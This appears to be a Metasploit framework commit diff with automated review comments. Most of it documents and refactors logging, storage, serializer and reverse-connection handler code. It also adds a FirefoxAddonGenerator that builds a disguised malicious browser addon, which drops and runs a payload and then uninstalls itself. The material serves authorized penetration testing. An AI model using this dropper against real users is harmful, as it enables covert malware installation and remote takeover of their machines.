# @param opts [Hash] Hash containing configuration options.
# @option opts 'ConfigFile' [Hash] configuration file these options apply
# to.
# @return [void]
# @example Save 'Cat' => 'Foo' in group 'ExampleGroup'
# save(
# 'ExampleGroup' =>
# {
# 'Foo' => 'Cat'
# })
#
def save(opts)
ini = Rex::Parser::Ini.new(opts['ConfigFile'] || config_file)


@ -4,19 +4,19 @@ require 'msf/base'
module Msf
###
#
# This module provides an initialization interface for logging.
#
###
class Logging
#Is logging initialized
#@private
@@initialized = false
#Is session logging enabled
#@private
@@session_logging = false
#
# Initialize logging.
#
# @return [void]
def self.init
if (! @@initialized)
@@initialized = true
@ -35,9 +35,13 @@ class Logging
end
end
# Enables a log source of name src. Creates the .log file in the
# configured directory if logging is not already enabled for this
# source.
#
# Enables a log source.
#
# @param src [String] log source name.
# @param level [Integer] logging level.
# @return [void]
def self.enable_log_source(src, level = 0)
if (log_source_registered?(src) == false)
f = Rex::Logging::Sinks::Flatfile.new(
@ -47,30 +51,33 @@ class Logging
end
end
#
# Stops logging for a given log source.
#
# @param src [String] the log source to disable.
# @return [Boolean] true if successful. false if not.
def self.disable_log_source(src)
deregister_log_source(src)
end
#
# Sets whether or not session logging is to be enabled.
#
# @param tf [Boolean] true if enabling. false if disabling.
# @return [void]
def self.enable_session_logging(tf)
@@session_logging = tf
end
#
# Returns whether or not session logging is enabled.
#
# @return [Boolean] true if enabled. false if disabled.
def self.session_logging_enabled?
@@session_logging || false
end
#
# Starts logging for a given session.
#
# @param session [Msf::Session] the session to start logging on.
# @return [void]
def self.start_session_log(session)
if (log_source_registered?(session.log_source) == false)
f = Rex::Logging::Sinks::Flatfile.new(
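Review bot: `enable_session_logging` stores its argument unchanged (`@@session_logging = tf`) while the new YARD text documents it as a Boolean, and `session_logging_enabled?` only coerces the falsy case with `|| false`, so any truthy non-boolean passed in (a string from a console setting, say) is handed back as-is. Normalising on write, `@@session_logging = tf ? true : false`, makes the documented `[Boolean]` return of `session_logging_enabled?` actually hold. The `@return [Boolean] true if successful. false if not.` on `disable_log_source` is only as true as `deregister_log_source`, which is defined outside this hunk, so that claim should be confirmed against it. `start_session_log`'s body continues outside the hunk.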
@ -82,9 +89,10 @@ class Logging
end
end
#
# Stops logging for a given session.
#
# @param session [Msf::Session] the session to stop logging.
# @return [Boolean] true if sucessful. false if not.
def self.stop_session_log(session)
rlog("\n[*] Logging stopped: #{Time.now}\n\n", session.log_source)


@ -1,24 +1,25 @@
# -*- coding: binary -*-
module Msf
###
#
# This class provides a generalized interface to persisting information,
# either in whole or in part, about the state of the framework. This can
# be used to store data that can later be reinitialized in a new instance
# of the framework or to provide a simple mechanism for generating reports
# of some form.
#
###
# @abstract Subclass and override {#initialize}, {#store}, and {#fetch}.
class PersistentStorage
@@storage_classes = {}
#
# Creates an instance of the storage class with the supplied name. The
# array supplied as an argument is passed to the constructor of the
# associated class as a means of generic initialization.
#
# @param name [String] the name of the storage class.
# @param params [Object] the parameters to give the new class.
# @return [PersistentStorage] the newly created class.
# @return [nil] if class has not been added through {.add_storage_class}.
def self.create(name, *params)
if (klass = @@storage_classes[name])
klass.new(*params)
@ -27,36 +28,42 @@ class PersistentStorage
end
end
#
# Stub initialization routine that takes the params passed to create.
#
# @param params [Object] the parameters to initialize with.
def initialize(*params)
end
#
# This methods stores all or part of the current state of the supplied
# framework instance to whatever medium the derived class implements.
# If the derived class does not implement this method, the
# NotImplementedError is raised.
#
# @param framework [Msf::Framework] framework state to store.
# @return [void] no implementation.
# @raise [NotImpementedError] raised if not implemented.
def store(framework)
raise NotImplementedError
end
#
# This method initializes the supplied framework instance with the state
# that is stored in the persisted backing that the derived class
# implements. If the derived class does not implement this method, the
# NotImplementedError is raised.
#
# @param framework [Msf::Framework] framework to restore state to.
# @return [void] no implementation.
# @raise [NotImplementedError] raised if not implemented.
def fetch(framework)
raise NotImplementedError
end
#
# This method adds a new storage class to the hash of storage classes that
# can be created through create.
#
# @param name [String] the name of the storage class.
# @param klass [PersistentStorage] the storage class to add.
# @return [void]
def self.add_storage_class(name, klass)
@@storage_classes[name] = klass
end
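Review bot: The new `@raise [NotImpementedError]` tag on `store` misspells the exception class the method actually raises, so YARD will link to a class that does not exist while the sibling tag on `fetch` is spelled correctly; it should be `# @raise [NotImplementedError] raised if not implemented.`. `@return [void] no implementation.` on both abstract methods is also misleading since they never return normally; a plain `@return [void]` or no `@return` tag at all reads better. `add_storage_class` places whatever `klass` it is handed into the class-level registry without checking that it responds to `store`/`fetch`; if anything other than the framework's own storage classes can reach it, a `respond_to?` check or a comment stating the expected duck type would be useful.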


@ -2,30 +2,29 @@
module Msf
class PersistentStorage
###
#
# This class persists the state of the framework to a flatfile in a human
# readable format. At the moment, the level of information it conveys is
# rather basic and ugly, but this is just a prototype, so it will be improved.
# Oh yes, it will be improved.
#
###
class Flatfile < PersistentStorage
#
# Initializes the flatfile for storage based on the parameters specified.
# The hash must contain a FilePath attribute.
#
# @overload initialize(path)
# Initializes the flatfile with the set path.
# @param path [String] path of the flatfile.
def initialize(*params)
raise ArgumentError, "You must specify a file path" if (params.length == 0)
self.path = params[0]
end
#
# This method stores the current state of the framework in human readable
# form to a flatfile. This can be used as a reporting mechanism.
#
# @param framework [Msf:::Framework] the Framework to store.
# @return [void]
def store(framework)
# Open the supplied file path for writing.
self.fd = File.new(self.path, "w")
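Review bot: The new `@param framework [Msf:::Framework] the Framework to store.` tag has a triple colon, so YARD cannot resolve the type; it should be `@param framework [Msf::Framework] the Framework to store.`. The method itself opens the report with `self.fd = File.new(self.path, "w")` under default permissions; since the comment above says the dump is the framework's current state, `File.new(self.path, "w", 0600)` would keep it readable only by the owning user. Whether the handle is closed cannot be seen here because `store`'s body continues past the hunk.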
@ -41,10 +40,11 @@ protected
attr_accessor :fd, :path # :nodoc:
#
# This method stores general information about the current state of the
# framework instance.
#
# @param framework [Msf::Framework] the Framework to store.
# @return [void]
def store_general(framework)
fd.print(
"\n" +
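Review bot: The new YARD tag on `store` mistypes the class as `@param framework [Msf:::Framework]` (triple colon), so the type will not resolve to `Msf::Framework` in generated docs; make it `@param framework [Msf::Framework] the Framework to store.`, matching the tag on `store_general` just below. `store` also opens `File.new(self.path, "w")` and parks the descriptor in `fd`; its body continues outside the hunk, so it is worth confirming the descriptor is closed on every path, though that line is pre-existing context rather than part of this change.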


@ -2,22 +2,22 @@
module Msf
module Serializer
###
#
# This class formats information in a plain-text format that
# is meant to be displayed on a console or some other non-GUI
# medium.
#
###
class ReadableText
#Default number of characters to wrap at.
DefaultColumnWrap = 70
#Default number of characters to indent.
DefaultIndent = 2
#
# Returns a formatted string that contains information about
# the supplied module instance.
#
# @param mod [Msf::Module] the module to dump information for.
# @param indent [String] the indentation to use.
# @return [String] formatted text output of the dump.
def self.dump_module(mod, indent = " ")
case mod.type
when MODULE_PAYLOAD
@ -37,9 +37,14 @@ class ReadableText
end
end
#
# Dumps an exploit's targets.
#
# @param mod [Msf::Exploit] the exploit module to dump targets
# for.
# @param indent [String] the indentation to use (only the length
# matters).
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_exploit_targets(mod, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -57,9 +62,13 @@ class ReadableText
tbl.to_s + "\n"
end
#
# Dumps the exploit's selected target
#
# @param mod [Msf::Exploit] the exploit module.
# @param indent [String] the indentation to use (only the length
# matters)
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_exploit_target(mod, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -75,9 +84,13 @@ class ReadableText
tbl.to_s + "\n"
end
#
# Dumps an auxiliary's actions
#
# @param mod [Msf::Auxiliary] the auxiliary module.
# @param indent [String] the indentation to use (only the length
# matters)
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_auxiliary_actions(mod, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -95,10 +108,14 @@ class ReadableText
tbl.to_s + "\n"
end
#
# Dumps the table of payloads that are compatible with the supplied
# exploit.
#
# @param exploit [Msf::Exploit] the exploit module.
# @param indent [String] the indentation to use (only the length
# matters)
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_compatible_payloads(exploit, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -116,9 +133,11 @@ class ReadableText
tbl.to_s + "\n"
end
#
# Dumps information about an exploit module.
#
# @param mod [Msf::Exploit] the exploit module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_exploit_module(mod, indent = '')
output = "\n"
output << " Name: #{mod.name}\n"
@ -171,9 +190,11 @@ class ReadableText
end
#
# Dumps information about an auxiliary module.
#
# @param mod [Msf::Auxiliary] the auxiliary module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_auxiliary_module(mod, indent = '')
output = "\n"
output << " Name: #{mod.name}\n"
@ -207,9 +228,11 @@ class ReadableText
return output
end
#
# Dumps information about a payload module.
#
# @param mod [Msf::Payload] the payload module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_payload_module(mod, indent = '')
# General
output = "\n"
@ -244,9 +267,11 @@ class ReadableText
return output
end
#
# Dumps information about a module, just the basics.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_basic_module(mod, indent = '')
# General
output = "\n"
@ -277,13 +302,16 @@ class ReadableText
end
#No current use
def self.dump_generic_module(mod, indent = '')
end
#
# Dumps the list of options associated with the
# supplied module.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_options(mod, indent = '')
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length,
@ -309,9 +337,11 @@ class ReadableText
return tbl.to_s
end
#
# Dumps the advanced options associated with the supplied module.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_advanced_options(mod, indent = '')
output = ''
pad = indent
@ -333,9 +363,11 @@ class ReadableText
return output
end
#
# Dumps the evasion options associated with the supplied module.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_evasion_options(mod, indent = '')
output = ''
pad = indent
@ -358,6 +390,11 @@ class ReadableText
return output
end
# Dumps the references associated with the supplied module.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_references(mod, indent = '')
output = ''
@ -372,9 +409,13 @@ class ReadableText
output
end
#
# Dumps the contents of a datastore.
#
# @param name [String] displayed as the table header.
# @param ds [Msf::DataStore] the DataStore to dump.
# @param indent [Integer] the indentation size.
# @param col [Integer] the column width.
# @return [String] the formatted DataStore contents.
def self.dump_datastore(name, ds, indent = DefaultIndent, col = DefaultColumnWrap)
tbl = Rex::Ui::Text::Table.new(
'Indent' => indent,
@ -392,9 +433,17 @@ class ReadableText
return ds.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No entries in data store.\n"
end
#
# Dumps the list of active sessions.
#
# @param framework [Msf::Framework] the framework to dump.
# @param opts [Hash] the options to dump with.
# @option opts :session_ids [Array] the list of sessions to dump (no
# effect).
# @option opts :verbose [Boolean] gives more information if set to
# true.
# @option opts :indent [Integer] set the indentation amount.
# @option opts :col [Integer] the column wrap width.
# @return [String] the formatted list of sessions.
def self.dump_sessions(framework, opts={})
ids = (opts[:session_ids] || framework.sessions.keys).sort
verbose = opts[:verbose] || false
@ -437,12 +486,14 @@ class ReadableText
return framework.sessions.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active sessions.\n"
end
#
# Dumps the list of running jobs.
#
# If verbose is true, also prints the payload, LPORT, URIPATH and start
# time, if they exist, for each job.
#
# @param framework [Msf::Framework] the framework.
# @param verbose [Boolean] if true, also prints the payload, LPORT, URIPATH
# and start time, if they exist, for each job.
# @param indent [Integer] the indentation amount.
# @param col [Integer] the column wrap width.
# @return [String] the formatted list of running jobs.
def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap)
columns = [ 'Id', 'Name' ]
@ -479,10 +530,13 @@ class ReadableText
return framework.jobs.keys.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active jobs.\n"
end
#
# Jacked from Ernest Ellingson <erne [at] powernav.com>, modified
# a bit to add indention
#
# @param str [String] the string to wrap.
# @param indent [Integer] the indentation amount.
# @param col [Integer] the column wrap width.
# @return [String] the wrapped string.
def self.word_wrap(str, indent = DefaultIndent, col = DefaultColumnWrap)
return Rex::Text.wordwrap(str, indent, col)
end
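Review bot: The new `@option opts :session_ids` tag on `dump_sessions` says the option has "no effect", yet the very next line reads it (`ids = (opts[:session_ids] || framework.sessions.keys).sort`); the rest of the body is outside the hunk, so either `ids` is unused further down and that read is dead, or the tag is wrong. Please verify and, if the ids do drive the table, replace the tag text with `@option opts :session_ids [Array<Integer>] restrict the listing to these session ids (default: all)`. As a point of style, `dump_module` defaults `indent` to a single space while every other `dump_*` method in this file defaults to `''`; if that asymmetry is intentional a short comment on the signature would stop it being "fixed" later.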


@ -98,4 +98,7 @@ require 'msf/core/exploit/winrm'
# WebApp
require 'msf/core/exploit/web'
# Firefox addons
require 'msf/core/exploit/remote/firefox_addon_generator'
require 'msf/core/exploit/remote/browser_exploit_server'


@ -92,6 +92,15 @@ module Msf
"#{get_resource.chomp("/")}/#{@exploit_receiver_page}"
end
#
# Returns the absolute URL to the module's resource that points to on_request_exploit
#
# @return [String] absolute URI to the exploit page
#
def get_module_uri
"#{get_uri.chomp("/")}/#{@exploit_receiver_page}"
end
#
# Returns the current target
#
@ -166,8 +175,10 @@ module Msf
# Special keys to ignore because the script registers this as [:activex] = true or false
next if k == :clsid or k == :method
if v.class == Regexp
if v.is_a? Regexp
bad_reqs << k if profile[k.to_sym] !~ v
elsif v.is_a? Proc
bad_reqs << k unless v.call(profile[k.to_sym])
else
bad_reqs << k if profile[k.to_sym] != v
end
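Review bot: The new `elsif v.is_a? Proc` branch hands `profile[k.to_sym]` straight to the requirement proc, so a profile that lacks the key passes `nil`; a requirement written as `lambda { |ver| ver >= 10 }` would then raise inside the check and abort the whole requirement evaluation instead of simply marking `k` as unmet. If `profile` is a Hash, `bad_reqs << k unless profile.key?(k.to_sym) && v.call(profile[k.to_sym])` closes that gap; at minimum the contract deserves a comment on the branch, e.g. `# Proc requirements receive the (possibly nil) profile value and must return truthy to pass`. `get_module_uri` depends on `get_uri`, which is outside this hunk — presumably the absolute counterpart of `get_resource`, worth stating in its doc comment.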


@ -0,0 +1,174 @@
# -*- coding: binary -*-
###
#
# The FirefoxAddonGenerator allows a firefox exploit module to serve a malicious .xpi
# addon that will gain a session.
#
###
module Msf
module Exploit::Remote::FirefoxAddonGenerator
# Add in the supported datastore options
def initialize( info = {} )
super(update_info(info,
'Platform' => %w{ java linux osx solaris win },
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
}
],
[ 'Mac OS X PPC (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
]
],
'DefaultTarget' => 1
))
register_options( [
OptString.new('ADDONNAME', [ true,
"The addon name.",
"HTML5 Rendering Enhancements"
]),
OptBool.new('AutoUninstall', [ true,
"Automatically uninstall the addon after payload execution",
true
])
], self.class)
end
# @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the
# 'application/x-xpinstall' MIME type
def generate_addon_xpi
if target.name == 'Generic (Java Payload)'
jar = p.encoded_jar
jar.build_manifest(:main_class => "metasploit.Payload")
payload_file = jar.pack
payload_name='payload.jar'
payload_script=%q|
var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java
java.lang.System.setSecurityManager(null);
var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]);
var m = cl.loadClass("metasploit.Payload").getMethod("main", [java.lang.Class.forName("[Ljava.lang.String;")]);
m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]);
|
else
payload_file = generate_payload_exe
payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
payload_script=%q|
var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
process.init(tmp);
process.run(false,[],0);
|
if target.name != 'Windows x86 (Native Payload)'
payload_script = %q|
var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
chmod.initWithPath("/bin/chmod");
var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
process.init(chmod);
process.run(true, ["+x", tmp.path], 2);
| + payload_script
end
end
zip = Rex::Zip::Archive.new
xpi_guid = Rex::Text.rand_guid
bootstrap_script = %q|
function startup(data, reason) {
var file = Components.classes["@mozilla.org/file/directory_service;1"].
getService(Components.interfaces.nsIProperties).
get("ProfD", Components.interfaces.nsIFile);
file.append("extensions");
|
bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|
bootstrap_script << %Q|payload_name="#{payload_name}";|
bootstrap_script << %q|
file.append(xpi_guid);
file.append(payload_name);
var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
getService(Components.interfaces.nsIProperties).
get("TmpD", Components.interfaces.nsIFile);
tmp.append(payload_name);
tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
file.copyTo(tmp.parent, tmp.leafName);
|
bootstrap_script << payload_script
if (datastore['AutoUninstall'])
bootstrap_script << %q|
try { // Fx < 4.0
Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
} catch (e) {}
try { // Fx 4.0 and later
Components.utils.import("resource://gre/modules/AddonManager.jsm");
AddonManager.getAddonByID(xpi_guid, function(addon) {
addon.uninstall();
});
} catch (e) {}
|
end
bootstrap_script << "}"
zip.add_file('bootstrap.js', bootstrap_script)
zip.add_file(payload_name, payload_file)
zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n")
zip.add_file('install.rdf', %Q|<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<Description about="urn:mozilla:install-manifest">
<em:id>#{xpi_guid}</em:id>
<em:name>#{datastore['ADDONNAME']}</em:name>
<em:version>1.0</em:version>
<em:bootstrap>true</em:bootstrap>
<em:unpack>true</em:unpack>
<em:targetApplication>
<Description>
<em:id>toolkit@mozilla.org</em:id>
<em:minVersion>1.0</em:minVersion>
<em:maxVersion>*</em:maxVersion>
</Description>
</em:targetApplication>
<em:targetApplication>
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
<em:minVersion>1.0</em:minVersion>
<em:maxVersion>*</em:maxVersion>
</Description>
</em:targetApplication>
</Description>
</RDF>|)
zip.add_file('overlay.xul', %q|<?xml version="1.0"?>
<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script src="bootstrap.js"/>
<script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script>
</overlay>|)
zip
end
end
end
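Review bot: `datastore['ADDONNAME']` is interpolated verbatim into the `<em:name>` element of `install.rdf`, so an addon name containing `&`, `<` or `"` yields a malformed manifest and Firefox rejects the XPI before `bootstrap.js` ever runs; escape it (e.g. `<em:name>#{Rex::Text.html_encode(datastore['ADDONNAME'])}</em:name>` or a gsub of the four XML metacharacters) and note why in a comment — `xpi_guid` and `payload_name` are generated, so they do not need the same treatment. Separately, the dropped payload is created with `tmp.createUnique(..., 0666)`, which (modulo the process umask) leaves it world-writable during the window between `file.copyTo` and `process.run` on the Linux/OSX targets, letting any local user swap the binary before it executes as the browser user; `0600` suffices since the same script `chmod +x`es it. Finally, `generate_addon_xpi` returns a `Rex::Zip::Archive` while its comment promises a ready-to-serve `.xpi`; if the caller has to pack it (as the Java branch does with `jar.pack`), say so in the `@return` tag.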


@ -83,23 +83,10 @@ module ReverseHttp
# addresses.
#
def full_uri
unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty?
lhost = datastore['HIDDENHOST']
else
lhost = datastore['LHOST']
end
if lhost.empty? or lhost == "0.0.0.0" or lhost == "::"
lhost = Rex::Socket.source_address
end
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
addrs = bind_address
local_port = bind_port
scheme = (ssl?) ? "https" : "http"
unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0
uri = "#{scheme}://#{lhost}:#{datastore["HIDDENPORT"]}/"
else
uri = "#{scheme}://#{lhost}:#{datastore["LPORT"]}/"
end
uri
"#{scheme}://#{addrs[0]}:#{local_port}/"
end
#
@ -163,6 +150,7 @@ module ReverseHttp
OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]),
OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]),
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>' ])
], Msf::Handler::ReverseHttp)
end
@ -186,17 +174,13 @@ module ReverseHttp
comm = nil
end
# Determine where to bind the HTTP(S) server to
bindaddrs = ipv6 ? '::' : '0.0.0.0'
if not datastore['ReverseListenerBindAddress'].to_s.empty?
bindaddrs = datastore['ReverseListenerBindAddress']
end
local_port = bind_port
addrs = bind_address
# Start the HTTPS server service on this host/port
self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server,
datastore['LPORT'].to_i,
bindaddrs,
local_port,
addrs[0],
ssl?,
{
'Msf' => framework,
@ -413,6 +397,33 @@ protected
obj.service.close_client( cli )
end
protected
def bind_port
port = datastore['ReverseListenerBindPort'].to_i
port > 0 ? port : datastore['LPORT'].to_i
end
def bind_address
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs
end
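Review bot: In the new `bind_address` helper the wildcard normalisation reads `addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")`; `addrs` is an Array, so the second comparison is always false and a `ReverseListenerBindAddress` of `::0` is never mapped onto the family-appropriate any-address (the bare `::` form is not handled either). Use `addrs[0] = any if %w[0.0.0.0 ::0 ::].include?(addrs[0])`. This helper is pasted verbatim into the reverse_tcp and reverse_tcp_ssl handlers in the same commit, so the typo lives in three places; a small shared mixin would stop them drifting. Judging by the hunk counts on `full_uri` (23 lines became 10), the new body now puts `addrs[0]` — the *bind* address — into the stager URI; the old code substituted `Rex::Socket.source_address` for a wildcard LHOST, so a wildcard bind now appears to produce `http://0.0.0.0:port/`, which no client can connect back to — please re-check that path.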
end


@ -42,13 +42,17 @@ module ReverseHttpsProxy
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]),
OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]),
OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
], Msf::Handler::ReverseHttpsProxy)
register_advanced_options(
[
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])
], Msf::Handler::ReverseHttpsProxy)
end
end
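Review bot: The descriptions on `PROXY_USERNAME` and `PROXY_PASSWORD` read "authentification"; the word is "authentication", and these strings are shown to the operator by `show options`, so it is worth fixing while this block is being edited. The newly registered `ReverseListenerBindAddress`/`ReverseListenerBindPort` advanced options only take effect if this handler's listener setup (outside the hunk) goes through the `bind_address`/`bind_port` helpers added to ReverseHttp in this commit; if ReverseHttpsProxy inherits that path it is fine, otherwise the options would be accepted and silently ignored.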


@ -53,8 +53,9 @@ module ReverseTcp
[
OptInt.new('ReverseConnectRetries', [ true, 'The number of connection attempts to try before exiting the process', 5 ]),
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]),
OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false])
], Msf::Handler::ReverseTcp)
@ -72,13 +73,6 @@ module ReverseTcp
end
ex = false
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
comm = datastore['ReverseListenerComm']
if comm.to_s == "local"
@ -87,19 +81,15 @@ module ReverseTcp
comm = nil
end
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
local_port = bind_port
addrs = bind_address
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs.each { |ip|
begin
self.listener_sock = Rex::Socket::TcpServer.create(
'LocalHost' => ip,
'LocalPort' => datastore['LPORT'].to_i,
'LocalPort' => local_port,
'Comm' => comm,
'Context' =>
{
@ -119,11 +109,11 @@ module ReverseTcp
via = ""
end
print_status("Started reverse handler on #{ip}:#{datastore['LPORT']} #{via}")
print_status("Started reverse handler on #{ip}:#{local_port} #{via}")
break
rescue
ex = $!
print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}")
print_error("Handler failed to bind to #{ip}:#{local_port}")
end
}
raise ex if (ex)
@ -140,7 +130,8 @@ module ReverseTcp
# Starts monitoring for an inbound connection.
#
def start_handler
self.listener_thread = framework.threads.spawn("ReverseTcpHandlerListener-#{datastore['LPORT']}", false) {
local_port = bind_port
self.listener_thread = framework.threads.spawn("ReverseTcpHandlerListener-#{local_port}", false) {
client = nil
begin
@ -159,7 +150,7 @@ module ReverseTcp
end while true
}
self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{datastore['LPORT']}", false) {
self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{local_port}", false) {
while true
client = self.handler_queue.pop
begin
@ -241,6 +232,31 @@ module ReverseTcp
protected
def bind_port
port = datastore['ReverseListenerBindPort'].to_i
port > 0 ? port : datastore['LPORT'].to_i
end
def bind_address
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs
end
attr_accessor :listener_sock # :nodoc:
attr_accessor :listener_thread # :nodoc:
attr_accessor :handler_thread # :nodoc:
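Review bot: The extracted `bind_address` helper carries the same wildcard typo as its siblings — `addrs == "::0"` compares the Array to a String and is always false, so only the literal `0.0.0.0` is ever replaced by `any`; change the line to `addrs[0] = any if %w[0.0.0.0 ::0 ::].include?(addrs[0])`. Since `bind_port` and `bind_address` are now identical across reverse_tcp, reverse_tcp_ssl and reverse_http, hoisting them into one shared mixin would give a single place to fix this and to document the fallback order (`LHOST` first, then the family's any-address, unless `ReverseListenerBindAddress` pins it). The comment `# Switch to IPv6 ANY address if the LHOST is also IPv6` sits above the `resolv_nbo` call but describes the `any =` line two lines later; moving it down makes the helper read correctly.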


@ -43,7 +43,9 @@ module ReverseTcpSsl
